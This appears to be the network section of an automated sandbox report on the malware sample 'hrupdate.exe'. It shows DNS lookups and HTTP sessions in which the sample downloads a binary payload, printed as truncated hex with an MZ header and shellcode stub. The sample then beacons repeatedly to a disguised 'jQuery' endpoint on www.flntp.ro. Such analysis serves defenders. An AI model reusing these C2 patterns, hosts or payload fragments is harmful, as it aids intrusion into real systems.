                                    Dec 19, 2024 22:47:45.695116043 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.695162058 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.696495056 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.696610928 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.696655035 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.698016882 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.698120117 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.698163986 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.699515104 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.699600935 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.699641943 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.701015949 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.701137066 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.701195955 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.702467918 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.702585936 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.702630997 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.703982115 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.704093933 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.704135895 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.705461979 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.705733061 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.705775976 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.707118988 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.707176924 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.707222939 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.708441973 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.708576918 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.708619118 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.709939957 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.709985971 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.710109949 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.829502106 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.948254108 CET49946443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.948290110 CET443499463.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.948363066 CET49946443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.961430073 CET49946443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.961467028 CET443499463.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:47.362474918 CET443499463.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:47.362576962 CET49946443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:47.418261051 CET49946443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:47.418327093 CET443499463.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:47.418678999 CET443499463.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:47.418742895 CET49946443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:47.420763969 CET49946443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:47.467328072 CET443499463.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:48.218329906 CET443499463.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:48.218398094 CET443499463.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:48.218466997 CET49946443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:48.218534946 CET443499463.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:48.218570948 CET443499463.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:48.218570948 CET49946443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:48.218600988 CET49946443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:48.218635082 CET49946443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:48.218815088 CET49946443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:48.218868971 CET443499463.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:01.711493015 CET49979443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:01.711571932 CET443499793.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:01.711666107 CET49979443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:01.717787027 CET49979443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:01.717818975 CET443499793.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:03.105918884 CET443499793.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:03.106050968 CET49979443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:03.106532097 CET49979443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:03.106564999 CET443499793.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:03.108278990 CET49979443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:03.108293056 CET443499793.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:03.797652006 CET443499793.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:03.797713995 CET443499793.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:03.797739983 CET49979443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:03.797791958 CET443499793.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:03.797847986 CET49979443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:03.797847986 CET49979443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:03.797859907 CET443499793.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:03.797899008 CET49979443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:03.797940969 CET49979443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:03.797971964 CET443499793.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:13.529289007 CET49980443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:13.529334068 CET443499803.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:13.529428005 CET49980443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:13.529742956 CET49980443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:13.529757977 CET443499803.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:14.915308952 CET443499803.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:14.915431023 CET49980443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:14.916173935 CET49980443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:14.916184902 CET443499803.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:14.918083906 CET49980443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:14.918091059 CET443499803.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:15.610899925 CET443499803.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:15.610964060 CET443499803.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:15.611021996 CET49980443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:15.611048937 CET443499803.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:15.611062050 CET49980443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:15.611102104 CET49980443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:15.611124992 CET443499803.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:15.611185074 CET49980443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:15.611399889 CET49980443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:15.611414909 CET443499803.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:27.284576893 CET49981443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:27.284636021 CET443499813.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:27.284723043 CET49981443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:27.285027981 CET49981443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:27.285043955 CET443499813.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:28.669029951 CET443499813.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:28.669097900 CET49981443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:28.669615984 CET49981443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:28.669632912 CET443499813.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:28.671854019 CET49981443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:28.671874046 CET443499813.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:29.363706112 CET443499813.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:29.363739967 CET443499813.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:29.363810062 CET49981443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:29.363822937 CET49981443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:29.363826036 CET443499813.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:29.363873959 CET49981443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:29.364164114 CET49981443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:29.364182949 CET443499813.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:44.299640894 CET49982443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:44.299673080 CET443499823.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:44.299771070 CET49982443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:44.300062895 CET49982443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:44.300074100 CET443499823.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:45.784198999 CET443499823.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:45.784590960 CET49982443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:45.785428047 CET49982443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:45.785444021 CET443499823.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:45.787087917 CET49982443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:45.787106037 CET443499823.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:46.485691071 CET443499823.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:46.485812902 CET443499823.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:46.485852003 CET49982443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:46.485872030 CET443499823.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:46.485883951 CET49982443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:46.485927105 CET49982443192.168.2.53.79.209.76
                                    Dec 19, 2024 22:48:46.485959053 CET443499823.79.209.76192.168.2.5
                                    Dec 19, 2024 22:48:46.486006021 CET49982443192.168.2.53.79.209.76

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 19, 2024 22:45:41.506064892 CET6143253192.168.2.51.1.1.1
                                    Dec 19, 2024 22:45:41.901235104 CET53614321.1.1.1192.168.2.5
                                    Dec 19, 2024 22:47:45.803864956 CET5258353192.168.2.51.1.1.1
                                    Dec 19, 2024 22:47:45.944801092 CET53525831.1.1.1192.168.2.5

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 19, 2024 22:45:41.506064892 CET192.168.2.51.1.1.10x5338Standard query (0)www.hrtraining.roA (IP address)IN (0x0001)false
                                    Dec 19, 2024 22:47:45.803864956 CET192.168.2.51.1.1.10xaeccStandard query (0)www.hrtraining.roA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 19, 2024 22:45:41.901235104 CET1.1.1.1192.168.2.50x5338No error (0)www.hrtraining.roec2-3-79-209-76.eu-central-1.compute.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                    Dec 19, 2024 22:45:41.901235104 CET1.1.1.1192.168.2.50x5338No error (0)ec2-3-79-209-76.eu-central-1.compute.amazonaws.com3.79.209.76A (IP address)IN (0x0001)false
                                    Dec 19, 2024 22:47:45.944801092 CET1.1.1.1192.168.2.50xaeccNo error (0)www.hrtraining.roec2-3-79-209-76.eu-central-1.compute.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                    Dec 19, 2024 22:47:45.944801092 CET1.1.1.1192.168.2.50xaeccNo error (0)ec2-3-79-209-76.eu-central-1.compute.amazonaws.com3.79.209.76A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • www.flntp.ro
                                    • www.hrtraining.ro

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.5497043.79.209.76806664C:\Users\user\Desktop\hrupdate.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 19, 2024 22:45:42.024553061 CET58OUTGET /trakingu/user HTTP/1.0
                                    Host: www.hrtraining.ro
                                    Dec 19, 2024 22:45:43.281513929 CET321INHTTP/1.1 404 Not Found
                                    Server: nginx/1.24.0 (Ubuntu)
                                    Date: Thu, 19 Dec 2024 21:45:43 GMT
                                    Content-Type: text/html
                                    Content-Length: 162
                                    Connection: close
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.5499383.79.209.76806664C:\Users\user\Desktop\hrupdate.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 19, 2024 22:47:43.627811909 CET62OUTGET /trainingcheck_v5498 HTTP/1.0
                                    Host: www.hrtraining.ro
                                    Dec 19, 2024 22:47:44.887485981 CET1236INHTTP/1.1 200 OK
                                    Server: nginx/1.24.0 (Ubuntu)
                                    Date: Thu, 19 Dec 2024 21:47:44 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 278025
                                    Last-Modified: Mon, 04 Nov 2024 13:31:08 GMT
                                    Connection: close
                                    ETag: "6728cc9c-43e09"
                                    Accept-Ranges: bytes
                                    Data Raw: 90 90 90 90 90 90 90 90 90 4d 5a 52 45 e8 00 00 00 00 5b 89 df 55 89 e5 81 c3 e3 ba 00 00 ff d3 68 f0 b5 a2 56 68 04 00 00 00 57 ff d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 af ba e0 52 13 9e cc 0e 84 15 0a 33 f1 4c 79 ae a8 e7 72 2c 30 7b a4 b7 23 50 7f 8f 4d 94 b9 2f 67 54 df 12 db b4 48 7a ec 0f 66 bd 63 0e 7d f4 17 64 c4 e6 57 80 fe 45 10 20 f6 ed 9f c8 be f6 75 c4 f1 dc 8b 05 34 bc 0b ad 20 fc 3b 8c 77 d1 d7 1a 65 87 ae a1 37 ff 4d 63 75 ac 19 42 e3 45 70 fd f5 ca 3e 21 14 91 1c 54 e8 71 d2 3f 98 89 d2 bc f1 74 36 25 a2 3b b8 c4 16 42 0e d2 1d a7 b3 c1 eb f8 7f 27 2e 7f bf 4b e7 8c 15 98 b0 97 f3 82 0f 98 a6 d2 15 37 d3 e0 43 a2 a6 84 b8 60 dd 57 8d 8c ce a0 b6 aa 79 c2 72 6b 07 98 5d 83 4e 4f 00 00 4c 01 04 00 40 44 25 58 00 00 00 00 0b e2 0e 71 e0 00 03 31 0b 01 09 00 00 c4 02 00 00 f8 01 00 00 00 00 00 c0 ed 09 00 00 10 00 00 00 e0 02 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 47 00 00 04 00 00 00 [TRUNCATED]
                                    Data Ascii: MZRE[UhVhWR3Lyr,0{#PM/gTHzfc}dWE u4 ;we7McuBEp>!Tq?t6%;B'.K7C`Wyrk]NOL@D%Xq1 G@{Qjd0(%kU `%j!@@%oj4f@%kd"$@B2DV}6]QO")22gb=Vs>)1Uf)TbPg~`f<*AY!Rt%By~3R=NOY;#yXG9#iz:gZ}K5v;B\(]D'd#2Lpc.=/Z_%"DR2I9KI}bh{.brn#/\l?J\)<-tevr|d+$#/`/
                                    Dec 19, 2024 22:47:44.887603998 CET1236INData Raw: 5c 99 5d 82 0a a3 45 b1 3e 3c 15 7c c8 7f e2 f0 09 a1 3c 6c d6 66 d5 66 fe 81 82 e5 87 89 51 e2 f7 53 2c e8 c6 00 03 18 6d c6 69 2c 14 ac 12 2f ce 0a 58 17 47 87 18 00 00 00 00 5d b5 b7 21 0a e2 0e fa fb 5d e6 01 0f f2 fd d4 54 25 0b 91 7b e6 1e
                                    Data Ascii: \]E><|<lffQS,mi,/XG]!]T%{p/'87H&2qX$(Kqi~{Vk{qJqqDa&ay{u0z'Zk_y80L(k_e{z*q&
                                    Dec 19, 2024 22:47:44.887646914 CET1236INData Raw: c7 0e 71 52 bb e5 62 61 e2 f1 04 1b 1d 7b 7d f4 97 06 99 76 1d f1 8e 88 26 1e 28 56 21 e6 d0 24 e2 0e 54 f5 1d f1 0e c8 b7 85 9d 88 0e 4a 22 5d b5 66 99 2f e2 0e 99 60 68 0e 71 80 12 c9 75 2f e2 0f 71 0b b4 e6 53 87 e2 0e ce 8b e2 0e 71 5c b4 87
                                    Data Ascii: qRba{}v&(V!$TJ"]f/`hqu/qSq\4dQ]kKqak(:4(.qaWN4dY]kK"q.nXVaRqC(uUhcq2;{uK(qd7
                                    Dec 19, 2024 22:47:44.888118982 CET1236INData Raw: e2 0e f2 36 1a 3c 75 1b e2 01 f6 fa 1f f1 8e e3 1e 2f 71 0b 0a af 84 0b e2 51 2f 50 2b cd 24 80 0e 8d 9d 1b b4 59 8e 7e ea e6 49 8d e2 0e fa fb aa 57 05 0d aa 7b 7c 5b 09 0c 1b 0a 0a 06 a8 0b e2 8d b5 0f 0a 1d a8 0b e2 85 89 86 a7 fe 1b 1a b2 e6
                                    Data Ascii: 6<u/qQ/P+$Y~IW{|[~4QNX!qoKa^q&[~#%N!_q[e4TQ/![c"]fBoU"[mNNF]!sa}aoUeqR
                                    Dec 19, 2024 22:47:44.888154030 CET896INData Raw: ee 0e 71 5b 6f 4b 81 e3 e9 02 71 0b b2 e6 53 fd 1d f1 fc 4e 12 5e 99 d7 e9 0e 71 88 26 1e 2e 55 2b cd d0 e7 56 0a 61 62 2b f6 71 0b e2 67 a3 f3 e2 0e 71 5d b5 64 4f 86 9e 0f 61 52 6f 7a 73 1b 11 ab 2e 55 21 85 7c e7 56 0a 61 62 22 f6 71 0b e2 66
                                    Data Ascii: q[oKqSN^q&.U+Vab+qgq]dOaRozs.U!|Vab"qfOu=87qu0k^!k^y[Htq0SnrU![c"]f!sa}ao`qR~dta%(qbq~dra
                                    Dec 19, 2024 22:47:44.888190031 CET1236INData Raw: 58 1e 6e 0b e2 72 fd e0 37 83 34 ef 8a 0e 70 0b e2 5e 99 cc e4 0e 71 f4 97 02 fc 4e 06 5e 99 00 e5 0e 71 f4 97 1e fc 4e 06 5e 99 f4 e4 0e 71 86 a7 ea 1b 1b b2 e6 85 0d e2 0e 8e 7e 16 83 34 ef b2 e6 99 0d e2 0e 8e 7e 1a 83 34 ef b2 e6 ad 0d e2 0e
                                    Data Ascii: Xnr74p^qN^qN^q~4~4dZ0q[oKq74(TU~p<<]'\Yq]Bo'[e]d1'[eq~qqWiqRsd
                                    Dec 19, 2024 22:47:44.888925076 CET1236INData Raw: b4 59 99 3b 1c f1 8e e0 23 64 70 61 83 e6 bd 18 e2 0e 28 52 bb cd fa f4 b5 28 71 1b 86 28 71 1b 8f 28 71 1b 94 28 71 1b 62 28 71 1b 68 28 71 1b 76 28 71 1b 76 28 71 1b b7 85 9d 88 0e 1e 27 5c 1d 7b 7d 86 a7 fe 8e 7e ea 5e 99 dd 9a 0e 71 86 a7 fe
                                    Data Ascii: Y;#dpa(R(q(q(q(qb(qh(qv(qv(q'\{}~^q^qCzjCnxqdsUosNdp[W(T^iN9h10{]pX~ssS^i'8X"qRgTX']q&!]X2KFqa}[X~=H9
                                    Dec 19, 2024 22:47:44.888961077 CET1236INData Raw: b7 85 9d 5a b1 58 26 e3 42 98 71 0b 6b 4b 8d 8e 22 70 23 80 bf 1e fc 70 ea 59 99 78 6c 0f 71 80 12 57 f4 fd 96 5e 8e 7e 1e e6 ae 73 e0 0e 8e 7e ea 87 77 e3 37 76 73 0b b1 f1 04 07 6b 48 75 86 a4 06 21 e3 6d f7 70 0b 88 37 26 5d 0a b5 99 f4 1d 59
                                    Data Ascii: ZX&BqkK"p#pYxlqW^~s~w7vskHu!mp7&]Y'paY{a&.U^iqoq}\qq(vi!'q&N(WT^i~${i~{~XXS^i~4{m
                                    Dec 19, 2024 22:47:44.888993979 CET1236INData Raw: d9 fd 7e 8f 23 0e 71 0b db 53 7d 7e 8e 37 2c f3 96 69 17 88 1a 0c 05 5f 88 22 28 e3 82 bf 71 0b 88 25 28 6d 6b 4b 7b e3 b6 bf 71 0b 84 85 3c 01 84 35 b0 7f d5 83 34 f7 b2 64 5a 52 0a 31 c0 0b e2 01 c6 cb b2 f1 44 3b 94 0a 61 5d b1 e6 57 c2 e2 0e
                                    Data Ascii: ~#qS}~7,i_"(q%(mkK{q<54dZR1D;a]W~dp\>xu;A}"]zh{x]PW0(?a0!zl]^Vs;E}RskE}]'qa}"l;aTU"\#(Eq{}~4!
                                    Dec 19, 2024 22:47:44.889637947 CET1236INData Raw: 22 70 6b 5b 69 48 3d f4 94 3a 72 cc b2 e6 6c fb e3 0e fa 4d ae 8d b5 07 e1 c9 f8 4d d6 3d b1 4b bd 55 b8 c8 b7 85 9d 88 0e 2e f2 6e 1a 0e 22 80 bf 06 27 5c 1d 7d 49 86 a7 ea 8e 78 d6 5e 99 6d 88 0e 71 88 26 02 fc 4e 06 64 61 5b 0a ad 1a 0b e2 57
                                    Data Ascii: "pk[iH=:rlMM=KU.n"'\}Ix^mq&Nda[W(4csiEuBcpiEeqg-p:/i~qm~qamiu}#g~wqmiue<t0{t]uhJpq5~G
                                    Dec 19, 2024 22:47:45.007430077 CET1236INData Raw: 1a 8d 9d 1b 6f 0a 55 63 e2 06 71 0b b2 e6 d9 e5 1d f1 8e 7e ea 83 35 2f ee 5e 99 e0 0c f1 8e f4 97 02 fc 4f c6 1a 21 e3 3c e0 8e f4 1d 7b 61 86 a6 2a 6d 5b 0a df 9f f4 1d 8d b5 2b 61 73 65 0b 96 2e fa 4e f6 83 21 0a 68 06 31 8f 2b 7b 88 20 20 5e
                                    Data Ascii: oUcq~5/^O!<{a*m[+ase.N!h1+{ ^~5/^&oJU^O[oU[W$dqa{yaaV![{}adqO&,{a'&,a{}&,8"^!


                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.5499463.79.209.764436664C:\Users\user\Desktop\hrupdate.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-19 21:47:47 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                    Host: www.flntp.ro
                                    Accept-Encoding: gzip, deflate
                                    Cookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtk
                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    2024-12-19 21:47:48 UTC235INHTTP/1.1 200 OK
                                    Server: nginx/1.24.0 (Ubuntu)
                                    Date: Thu, 19 Dec 2024 21:47:47 GMT
                                    Content-Type: application/javascript; charset=utf-8
                                    Content-Length: 5671
                                    Connection: close
                                    Cache-Control: max-age=0, no-cache
                                    Pragma: no-cache
                                    2024-12-19 21:47:48 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                    Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.5499793.79.209.764436664C:\Users\user\Desktop\hrupdate.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-19 21:48:03 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                    Host: www.flntp.ro
                                    Accept-Encoding: gzip, deflate
                                    Cookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtk
                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    2024-12-19 21:48:03 UTC235INHTTP/1.1 200 OK
                                    Server: nginx/1.24.0 (Ubuntu)
                                    Date: Thu, 19 Dec 2024 21:48:03 GMT
                                    Content-Type: application/javascript; charset=utf-8
                                    Content-Length: 5692
                                    Connection: close
                                    Cache-Control: max-age=0, no-cache
                                    Pragma: no-cache
                                    2024-12-19 21:48:03 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                    Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.5499803.79.209.764436664C:\Users\user\Desktop\hrupdate.exe
                                    TimestampBytes transferredDirectionData
